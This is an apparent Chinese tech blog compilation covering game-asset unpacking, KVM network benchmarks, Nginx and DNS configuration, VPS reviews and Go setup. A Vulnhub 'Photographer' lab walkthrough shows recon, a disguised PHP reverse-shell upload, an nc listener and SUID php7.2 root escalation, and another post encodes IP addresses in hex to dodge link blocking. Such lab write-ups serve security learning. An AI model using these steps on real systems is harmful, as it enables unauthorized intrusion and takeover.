对《奇迹觉醒》的解包研究学习 《奇迹MU：觉醒》是经韩国网禅正版授权，由北京天马时空网络技术有限公司研发，腾讯独家代理运营的一款手机游戏一、软件准备《apktool》1、apktool文件的下载apktool是反编译Android apk文件的工具，apktool的主页是 https://ibotpeaches.github.io/Apktool/；我们可以从这里找到最新版本的apktool.jar文件 https://bitbucket.org/iBotPeaches/apktool/downloads/，以及apktool的安装说明。2、apktool的安装前面我们已经下载了最新的apktool.jar文件，最新版本是2.3.1，请按照以下步骤操作，参考 https://ibotpeaches.github.io/Apktool/install/新建文本文件，将下面的脚本复制到文本并保存，然后重命名为apktool.bat;@echo off if "%PATH_BASE%" == "" set PATH_BASE=%PATH% set PATH=%CD%;%PATH_BASE%; chcp 65001 2>nul >nul java -jar -Duser.language=en -Dfile.encoding=UTF8 "%~dp0\apktool.jar" %*     从上面脚本中也可以看到是用apktool.jar文件去处理；将下载的apktool_2.3.1.jar文件重命名为apktool.jar；3、apktool的使用将上述两个文件apktool.bat和apktool.jar文件放到同一文件夹下（任意路径），打开命令窗口（win+R–>cmd–>enter）;定位到apktool所在的文件夹；（若有java的系统变量也是可以的）输入以下命令：apktool.bat d -f ***.apk objectFolderPath 其中，objectFolderPath为可选项，如果此项不存在，软件将会在apktool文件夹下新建一个apk文件名的文件夹，否则存储到目标文件夹《UnityStudio》1.下载运行地址:https://github.com/Perfare/UnityStudio/releases最新版本支持unity5.x《winhex》（可选）下载地址http://www.x-ways.net/winhex.zip二、过程1.使用apktool对目标apk安装包进行拆解cd F:\解包\qjjx apktool d 10040714_com.tencent.tmgp.tmsk.qj2_a951663_8.2.0_27fhqs.apk //我的环境已经配置好了环境变量，直接cd到目标目录使用即可解包完成，目录下生成了一个和文件包同名的文件夹观察目录，发现asset文件夹占据了几乎99%的大小，估算模型数据在此目录下其实好像都是这个目录腾讯的开发者还是素质很高的，每个目录下是什么都清清楚楚的2.搜寻读取资源文件经过查看装备Equip，发现大量的unity3d文件（以此为例）还是打开winhex确认一下使用的版本号也是5.x使用先前下载的UnityStudio（或称AssetStudio）批量打开文件目录或单独打开文件比如。。。。资源的内容已经展示出来了（不限于此目录），可以选择需要的资源文件导出三、总结该文，该教材仅仅用作个人学习研究使用，请勿利用教材内容，进行有损目标软件公司利益的事情（包括但不限于版权纠纷，非法入侵纠纷）。本教程慨不负责类似案例：https://www.silverdragon.cn/?p=1880 过程几乎相同，且适用于几乎所有unity3D引擎的游戏

对《神都夜行录》的解包研究学习 《神都夜行录》是由网易游戏制作发行的一款国风妖怪收集RPG手游。游戏的整体故事发生在大唐年间，神都盛世天下生平、魑魅魍魉百妖横行，玩家扮演的降妖师会历经各种冒险，学习降妖之术，解决各类神秘可疑的妖怪作乱事件一、软件准备1.PC端游戏客户端 2.quickbms 3.RMAViewer 4.IqeBrowser 5.Noesis 6.3dsmax 网盘下载：https://pan.baidu.com/s/1jLoyZBfGlDnxGxTHJFdX7g 7mnf 流程：*.npk -quickbms-> *.dat -RMAViewer-> *.iqe -IqeBrowser-> *.iqm -Noesis-> *.fbx -3dmax-> *.pmd -PmxEditor-> *.pmx二、资源定位163家的游戏，安装包都是npk封装、更新包嘛，，，搞不懂。真够大的。。。6个资源文件在 *\Netease\yxl 下，目标就是...够多的。。。三、准备解包先把几个资源文件复制一份单独操作。。。还是上winhex看看目标压缩制式NXPK？ 不是EXPK就好（没研究EXPK）用quickbms和官方脚本 nxpk.bms# NXPK npk (script 0.3.8) # Demon Seals HD and others # script for QuickBMS http://quickbms.aluigi.org get EXT extension math NAMES = -1 math EXISTS = 0 math NAMES_METHOD = 0 /* # this format is totally useless because it's only a sequence of integers string TMP p "%s_hash" EXT open FDDE TMP 1 EXISTS if EXISTS == 0 string TMP p "%s.hash" EXT open FDDE TMP 1 EXISTS endif */ if EXISTS == 0 open FDDE "hash" 1 EXISTS endif if EXISTS == 0 string TMP p "%s.info" EXT open FDDE TMP 1 EXISTS endif if EXISTS != 0 comtype zlib_noerror get TMP1 byte 1 get TMP2 byte 1 if TMP1 == 0x1f && TMP2 == 0x8b comtype gzip endif get SIZE asize 1 clog MEMORY_FILE 0 SIZE SIZE 1 get SIZE asize MEMORY_FILE for i = 0 savepos TMP MEMORY_FILE if TMP >= SIZE break endif get TMP line MEMORY_FILE getvarchr TMP0 TMP 0 if NAMES >= 0 if TMP0 == 0x53 || TMP0 == 0x73 # "S" and "sS" if TMP0 == 0x53 # "S'" string TMP << 2 else string TMP << 3 endif string TMP - 1 if i & 1 strlen TMPSZ TMP if TMPSZ != 32 || TMP & \ string TMP x TMP string TMP b TMP putvarchr TMP 32 0 endif string TMP u TMP string TMP p "_%s" TMP # LAME BUGFIX FOR QUICKBMS!!! putarray 10 NAMES TMP math NAMES + 1 else putarray 11 NAMES TMP endif math i + 1 endif else if TMP0 == 'a' math NAMES = 0 # skip the first string endif endif next else string TMP p "%s.map" EXT open FDDE TMP 1 EXISTS if EXISTS != 0 math NAMES_METHOD = 1 get MAP_SIZE asize 1 for OFFSET = 0 != MAP_SIZE get TMP line 1 string ELEMENTS S TMP NAME NAME_CRC ZSIZE ZCRC SIZE CRC OFFSET putarray 10 NAMES NAME_CRC putarray 11 NAMES NAME math NAMES + 1 savepos OFFSET 1 next endif endif /* # debug for x = 0 < NAMES getarray HASH 10 x getarray NAME 11 x print "%HASH% %NAME%" next x */ set KEY string "" for x = 0 < 0x100 xmath TMP "x - 2" putvarchr KEY x TMP next x idstring "NXPK" get FILES long get VER1 long get VER2 long get VER3 long math MODE = 0 if VER1 >= 1 && VER3 > 1 math MODE = 1 endif math INFO_SIZE = 0x1c if MODE != 0 math INFO_SIZE = 0x28 endif get OFFSET long # if I used this work-around it means it was necessary in a sample, don't know what sample... get NXPK_SIZE asize if OFFSET u> NXPK_SIZE xmath OFFSET "NXPK_SIZE - (FILES * INFO_SIZE)" endif goto OFFSET for i = 0 < FILES get NAME_CRC long get OFFSET long get ZSIZE long get SIZE long get ZCRC long get CRC long if MODE != 0 get DUMMY long get DUMMY long get FLAGS long get DUMMY long else get FLAGS long endif xmath ZFLAGS "FLAGS & 0xffff" xmath FLAGS "FLAGS >> 16" if ZFLAGS == 2 comtype lz4 else # 0 comtype zlib endif set NAME string "" if NAMES > 0 if NAMES_METHOD == 0 encryption md5 "" log MEMORY_FILE OFFSET ZSIZE encryption "" "" string QUICKBMS_HEXHASH p "_%s" QUICKBMS_HEXHASH # LAME BUGFIX FOR QUICKBMS!!! else math QUICKBMS_HEXHASH = NAME_CRC endif for x = 0 < NAMES getarray TMP 10 x if TMP == QUICKBMS_HEXHASH getarray NAME 11 x putarray 10 x "" math x = NAMES # break endif next x endif math FILENUM = 0 if FLAGS & 1 math TMP = 0x80 if TMP > ZSIZE math TMP = ZSIZE endif encryption xor KEY "" 0 TMP log MEMORY_FILE OFFSET TMP encryption "" "" math OFFSET + TMP xmath TMP "ZSIZE - TMP" append log MEMORY_FILE OFFSET TMP append math OFFSET = 0 math FILENUM = -1 endif if SIZE == ZSIZE log NAME OFFSET SIZE FILENUM else clog NAME OFFSET ZSIZE SIZE FILENUM endif next i 启动quickbms.exe 然后选择nxpk.bms作为payload，然后再选择要解的文件和保存目录然后自动就开始解了除去头部偏移字节，解包进度到99%，解包已经完成，获得12661个文件因为数据量比较大，这里仅对res1.npk拆解讲解。四、文件说明解包出来的文件有好几种类型，主要有如下几种既然主要还是研究模型，那么打开RMAViewer File》Open Folder 载入我们的res1文件夹选择列表内的文件可以进行浏览，上下键控制选择焦点，滚轮或QE控制远近，WSAD键控制视角，左键按住旋转模型比如。。。这里以茨木为例选择Save IQE导出有骨骼的模型，然后在res1文件夹中筛选出iqe后缀当然Save OBJ也是可以的。只不过就只有模型了。比如：如果导出的iqe有问题或为了保险，可通过IQEFix.exe进行一次修复操作，直接将文件拉进exe即可五、格式转换iqe:以文本格式 存储的可带骨骼带贴图模型文件 iqm:以二进制 存储的可带骨骼带贴图模型文件 区别:二进制比文本格式更为通用，能被大多数模型软件读取，且压缩率更高体积更小。启动IqeBrowser，吧我们的模型导入切记目录必须为纯英文，否则文件可能打不开选中要转换的模型 Ctrl+S保存 选择【*.iqm】启动Noesis将刚刚转换的iqm导入，转换为fbx文件贴图和模型UV方向一致，则可以直接贴材质，不一致贴上会错乱。六、查找贴图启动3dsmax 导入fbx查找对应的dds技巧是将res1与res2中的所有.dds整合到新建的文件夹选择浏览视图为详细信息，以文件大小排序，剪切所有文件大小为1366KB的高清贴图在3dmax中展UV图形，以此为根据，寻找目标dds文件导入七、总结该文，该教材仅仅用作个人学习研究使用，请勿利用教材内容，进行有损目标软件公司利益的事情（包括但不限于版权纠纷，非法入侵纠纷）。本教程慨不负责bilibili同步连接 https://www.bilibili.com/read/cv8274072

对《山海镜花》的解包研究学习 《山海镜花》 是游族旗下新番工作室研发的以《山海经》为蓝本创作的东方幻想3D回合制RPG手游一、软件准备《apktool》1、apktool文件的下载apktool是反编译Android apk文件的工具，apktool的主页是 https://ibotpeaches.github.io/Apktool/；我们可以从这里找到最新版本的apktool.jar文件 https://bitbucket.org/iBotPeaches/apktool/downloads/，以及apktool的安装说明。2、apktool的安装前面我们已经下载了最新的apktool.jar文件，最新版本是2.3.1，请按照以下步骤操作，参考 https://ibotpeaches.github.io/Apktool/install/新建文本文件，将下面的脚本复制到文本并保存，然后重命名为apktool.bat;@echo off if "%PATH_BASE%" == "" set PATH_BASE=%PATH% set PATH=%CD%;%PATH_BASE%; chcp 65001 2>nul >nul java -jar -Duser.language=en -Dfile.encoding=UTF8 "%~dp0\apktool.jar" %*     从上面脚本中也可以看到是用apktool.jar文件去处理；将下载的apktool_2.3.1.jar文件重命名为apktool.jar；3、apktool的使用将上述两个文件apktool.bat和apktool.jar文件放到同一文件夹下（任意路径），打开命令窗口（win+R-->cmd-->enter）;定位到apktool所在的文件夹；（若有java的系统变量也是可以的）输入以下命令：apktool.bat d -f ***.apk objectFolderPath 其中，objectFolderPath为可选项，如果此项不存在，软件将会在apktool文件夹下新建一个apk文件名的文件夹，否则存储到目标文件夹《UnityStudio》1.下载运行地址:https://github.com/Perfare/UnityStudio/releases最新版本支持unity5.x《winhex》（可选）下载地址http://www.x-ways.net/winhex.zip二、过程1.使用apktool对目标apk安装包进行拆解cd F:\解包\山海 apktool d com.youzu.shjh.huawei.apk //我的环境已经配置好了环境变量，直接cd到目标目录使用即可解包完成，目录下生成了一个和文件包同名的文件夹观察目录，发现asset文件夹占据了几乎99%的大小，估算模型数据在此目录下继续进入，发现AssetBundle目录下存在大量的数据文件，估测为目标2.搜寻读取资源文件经过查看，发现大量的dat文件初步经过修改后缀为obj dds 3ds打开无效，使用winhex读取文件发现UnityFS 5.x.x这样的文件头，确定为unity3d工程文件使用先前下载的UnityStudio（或称AssetStudio）批量打开文件目录或单独打开文件资源的内容已经展示出来了（不限于npc目录），可以选择需要的资源文件导出三、总结该文，该教材仅仅用作个人学习研究使用，请勿利用教材内容，进行有损目标软件公司利益的事情（包括但不限于版权纠纷，非法入侵纠纷）。本教程慨不负责bilibili同步连接 https://www.bilibili.com/read/cv8274140

云计算与KVM实践（网卡番外） KVM-QEMU虚拟化具有四种虚拟网络设备1.rtl8139 经典的100M螃蟹网卡兼容性好，但是性能差劲。 这个网卡模式是qemu-kvm默认的模拟网卡类型，RTL8139是Realtek半导体公司的一个10/100M网卡系列，是曾经非常流行（当然现在看来有点古老）且兼容性好的网卡，几乎所有的现代操作系统都对RTL8139网卡驱动的提供支持 2.e1000 经典的1000M的Intel网卡，兼容性好，但性能一般般 纯的QEMU（非qemu-kvm）默认就是提供Intel e1000系列的虚拟网卡 3.virtio 半虚拟化神作网卡，10G网络带宽，性能优秀，但占用CPU 类型是qemu-kvm对半虚拟化IO（virtio）驱动的支持 4.VT-d 物理设备透传网卡（SR-IOV），性能优秀，但考研硬件设备 ps：以上解释为个人解释，非严谨解释先按照顺序测试一下所有网卡设备性能。测试平台：宿主机系统：Ubuntu 18.04 宿主机CPU：Intel I7-3630QM 宿主机内存：8G 神州K580S移动平台 客户机系统 Windows10 1903 客户机CPU:I7-3630QM(四线程) 客户机内存：4G 软件平台：iperf3 PS：测试数据仅供参考，具体由平台而异一、Rtl8139网卡启动KVM虚拟机打开iperf3进行TCP速度测试RTL8139网卡客户机上行速度RTL8139网卡客户机下行速度可以看出上行速度略高于下行速度。但交换性能较低二、e1000网卡e1000网卡客户机上行速度e1000网卡客户机下行速度e1000网卡是其中比较诡异的，下行速度基本上满载，而上行只能占据越60%的性能。且交换性能较低三、Virtio网卡virtio网卡客户机上行速度virtio网卡客户机下行速度virtio是唯一可以达到10Gb/s的，根据文献一，其iperf测试速率可达到9.4。文献1还提到如果virtio配置不合理速度只能达到3.6。不用担心这个情况，经查验ovirt自己生成的虚拟机配置都是合理的使用virtio_net半虚拟化驱动，可以提高网络吞吐量（thoughput）和降低网络延迟（latency），从而让客户机中网络达到几乎和原生网卡差不多的性能。四，VT-d网卡（平台不支持，略过，但是是真正最接近原生平台性能的网卡（硬件虚拟化））

Nginx禁止ip方式访问80、443端口 很多时候，在部署CDN的Https回源的时候，令人烦躁的Shodan引擎会让世界知道你的源站地址，带来不少麻烦比如惨烈的本站，在云锁防恶意解析功能不知道跑哪去以后，变成了这样源站地址直接暴露，这样做cdn防御还有什么用，，，根据证书查询到源服务器。。。。于是就寻思着在NGINX上手动配置一个默认站点，NGINX的默认站点寻找顺序是按照配置文件顺序排列的，在找不到可用server_name的时候，自动返回第一个站点。于是乎，我们需要在server标签最前面配置一个默认server标签来屏蔽大部分错误的请求。不过首先，我们肯定不会特意去买了个证书去配置443的默认站点吧。那就先使用OpenSSL自签发一份NGINX可用的证书一、签发证书1.生成私钥文件：openssl genrsa -des3 -out server.key 2048Ps：会提示需要给证书加密码2.去除口令：mv server.key server.key.backopenssl rsa -in server.key.back -out server.keyPs：会提示询问证书的密码3.创建请求证书：openssl req -new -key server.key -out server.csrPS：会提示输入一些信息，可以乱填或一路回车4.生成证书文件：openssl x509 -req -days 36500 -in server.csr -signkey server.key -out server.crt这样我们就得到了这样四个文件二、配置NGINX1.上传我们的server.crt server.key文件到我们NGINX所在的服务器下2.修改配置文件，在所有server的最前面添加server { listen 80 default_server; listen 443 default_server; server_name _; ssl on; ssl_certificate /www/server.crt;//证书上传地址 ssl_certificate_key /www/server.key; ssl_prefer_server_ciphers on; ssl_session_cache shared:SSL:10m; ssl_session_timeout 10m; ssl_ciphers ECDHE-RSA-AES128-GCM-SHA256:ECDHE:ECDH:AES:HIGH:!NULL:!aNULL:!MD5:!ADH:!RC4; ssl_protocols TLSv1 TLSv1.1 TLSv1.2; return 403;//返回403错误，可以自定义页面或其他错误码 }PS：代码放置需求，在虚拟主机配置文件前或主站点前eg.(宝塔)三、结束然后咋办？还要说？当然是保存重启了或者重载拉：—）如果返回403的话，正常就是这样了这样一来，可以有效阻止绝大部分的针对主机和域名的扫描器，保障服务器安全

Linux中ping不通外网？ 在linux中ping www.baidu.com 无法ping通，出现：ping: www.baidu.com: Name or service not known 的错误，ping IP却可以通的， 一般是linux里的DNS没配置好。出现问题如图：解决方法1：在linux配置好相应的网关地址就行。方法：修改/etc/resolv.conf 文件，修改正确nameserver增加DNS服务器地址vi /etc/resolv.conf增加如下内容:nameserver 114.114.114.114 (电信的DNS)nameserver 8.8.8.8（googel的DNS）就可以实现ping通外网域名了解决方法2：在linux配置好相应的网卡设置就行vi /etc/sysconfig/network-scripts/ifcfg-eth*有一些VPS厂商的默认网关设置存在异常，需要手动配置正确的网关，否则无法联网

宝塔7.4.2 phpMyadmin未授权登录漏洞 宝塔昨天给每位注册用户基本上都发了这样一条消息经过询问一些大佬，得知是phpmyadmin登录的一个问题具体如下，在访问 IP:888/pma/ 的时候，不需要验证mysql账号密码即可以登录phpmyadmin如这个服务器这个服务器已经修复了这个服务器可以看到，不管是apache还是NGINX统统遭殃可以正常查询所有信息甚至是某政府网站。。。。也遭殃了漏洞修复@@@升级脚本@@@

Vulnhub靶场之Photographer: 1 废话不多说。下载安装先。启动kali虚拟机继续arp-scan -l查询目标ip目标：192.168.163.130，使用浏览器访问验证是目标地址使用nmap -sS -A 192.168.163.130查询相关的端口信息开放端口：80，139，445，8000刚刚80端口这边我们已经访问过了，是纯静态的内容，逐一访问，发现8000端口存在一个CMS系统是一个koken的cms，查询源码发现是0.22.24版本使用nikto扫描工具扫描目录nikto -h http://192.168.163.130:8000/可能存在admin目录，我们访问一下试试看页面设计的还不错。。。登录需要邮箱。我们目前没有，查阅exp库发现koken版本0.22.24的上传漏洞不过我没法登录，咋上传啊，首页也没有上传点呐于是乎，这个漏洞只能后期用刚刚我们发现存在445 139端口，具有smb的特征，那么，文件系统是否有值得我们搜索的东西呢使用enum4linux探索445端口 enum4linux 192.168.163.130没有账号密码，我们使用空密码连接挂载到我们本地目录下去看到有两个文件，第一个似乎是什么邮件的文件，我们cat一下那是密码吗？是邮箱号码？agi@photographer.com 或者daisa@photographer.com 密码： babygirl都试试看登录成功这样一来，刚刚的上传漏洞就能搞他了使用Kali自带的php反弹脚本来进行利用cp /usr/share/webshells/php/php-reverse-shell.php ~/yyssdd.php.jpg改一下监听端口七七八八。接下来上传，使用burp修改后缀名访问我们刚刚上传的另外在kali这边设置好监听nc -lvnp 1234监听好后开始访问，获取到反弹shell接下来python3 -c 'import pty;pty.spawn("/bin/bash")' 获取到交互式shell接下来查询关键的具有suid访问权限的程序find / -perm -u=s -type f 2>/dev/null发现有一个php7.2的东东具有权限，我们利用php7.2获取到root权限/usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"使用php7.2的exec调起sh执行获取到root最高权似乎是旗子，搞定

ShockHosting 1H2G HDD 9.99$VPS测评 给三个好评，一个给大硬盘，一个给线路，一个给性能这款是本站原配置 速度非常快，大硬盘和3.5GHZ的CPU真的很吸引人（CPU默频3.5GHZ+，动态加速4.5GHZ）自带20G硬防官方分SSD和HDD款，但是在实际测试中，SSD和HDD款除了4K性能有区别外，连续读写速度基本持平，还有半价优惠下面看看测速开始bbrplus后，国内貌似电信有点抽风其他基本能接近半个带宽的速度另外也能看到io也是蛮高的。实测机器无超开的情况，基本上能跑满还是很赞的回程路由：大部分都是走的CN2-GT从上海回国去程：徐州联通徐州移动徐州电信基本上各家走各家的GT线路，但是效果还是不错商家的态度也很好，提交工单可以免费换机房，语气一定要好，不要丢了国人的脸。这家的机器不管是做储存还是开站都ojbk，高主频带来的体验很不错。对cloudflare的支持比较优秀，不管是移动香港回源还是电信美国回源，延迟都在2-10ms以内。

Cloudcone 2H4G 3T 6.5$VPS测评 最近cloudcone给我邮箱打了促销的邮件鉴于手头资金不是很足，看到这个2h4G心动了，但是还是有点怕线路问题造成缓慢，又或者是超开机器还不错CPU是E3 2.5GHZ的KVM架构，推测可能是1230可以自己额外购买ddos防御IP，每个IP仅需2美元/月，而且可以购买多个，ddos防御最高值为1Tbps，由全球最顶级的voxility提供，支持支付宝。测试IP：173.82.226.1 高防测试IP：173.82.152.1测速脚本：可以看出，磁盘io还是不错的，cpu性能在实际使用中可能略低，怀疑可能稍微超开了一点点。安装BBRPlus之后的速度不错，鉴于第一次做测评，脚本还出错了，哈哈下面看看路由去程江苏徐州电信走CN2 -GIA 过59.43.*.*去程江苏徐州移动GIA似乎去程江苏徐州联通GIA乍一看貌似都是各走各的线路，但是延迟还算阔以全网回程路由如果使用高防IP是禁止ICMP流量的。自测20G峰值流量无伤使用cloudflare的用户做好心理准备，CF移动香港直连到改机房的速度超过150MS，移动、教育网用户可能体验较差。可以考虑不加cdn。。。

十六进制网址探究 今天在某php群里看到了这样一个消息这奇怪的的域名把道锋我吓了一大跳，关键是，他能访问？？看这个后缀，意识到哪里不对劲，这绝对不是“正常”的域名访问的时候稍微研究了一下他的URL先是访问到了一个ip，然后才去向他的网站的。难道是ip有问题？我的咋就不能这么折腾呢？我这犟脾气上来了，看了看他的地址：http://0X6A.0X0341D84很明显的看到有0x这个字符串。。这是？0x是十六进制的特征，可以理解成是一个注释，让计算机系统知道你这串数据是十六进制编码。既然知道这是十六进制了，拿这串地址的真实意思是什么呢？脑子抽筋的我，先是选择十六进制转字符来转换。结果。。。毫不意外，直接乱码警告。。。死脑筋的我一时间没转过弯来。直到我第二次访问火狐浏览器给我跳这段下拉。0x6a下方的IP虽然是计数到255，但是本身是十进制啊。难不成要十六进制转十进制？果然呢。。。。xxx.xxx.xxx.xxx都找到了一一对应的数据，那就很明白了，这串地址的编码顺序应该是这样的设aaa.bbb.ccc.ddd则地址串应该是 http://0X (HEXaaa).0X (HEXbbb)(HEXccc)(HEXddd)这么说，我也能用这东西来防红咯来到服务器，先安装上NGINX。记录下地址47.101.190.190根据换算HEX47=2f HEX101=65 HEX190=be 整合成地址：http://0X2f.0X065BEBE/完美，再设置一下NGINX目录302重定向就实现防红了这位老哥真的是骚气啊。类似的操作还比如八进制只不过八进制模式貌似没法完整转换成纯八进制编码串（可能是我打开方式不对）

搭建Go语言开发环境 Golang是啥？Go（又称 Golang）是 Google 的 Robert Griesemer，Rob Pike 及 Ken Thompson 开发的一种静态强类型、编译型语言。Go 语言语法与 C 相近，但功能上有：内存安全，GC（垃圾回收），结构形态及 CSP-style 并发计算。一、安装1.下载推官网下载：https://golang.org/dl/或者使用镜像站点（推荐，速度较快）：https://golang.google.cn/dl/这里介绍的是Window开发环境（笔者懒得用Linux开发了（反正可以跨平台交叉编译））我是X64 Windows平台，，，一路next，再改一下路径就好。安装完成后，进入终端 用go version验证是否安装成功2.配置GOPATH类似的，和安装Java的环境类似，需要我们配置环境变量GOPATH路径最好只设置一个，所有的项目代码都放到GOPATH的src目录下。搞定，这样一来，在进行Go开发的时候，我们的代码总是会保存在$GOPATH/src目录下。在工程经过go build、go install或go get等指令后，会将下载的第三方包源代码文件放在$GOPATH/src目录下， 产生的二进制可执行文件放在 $GOPATH/bin目录下，生成的中间缓存文件会被保存在 $GOPATH/pkg 下。ps：下一篇，在IDE中开发编辑GO项目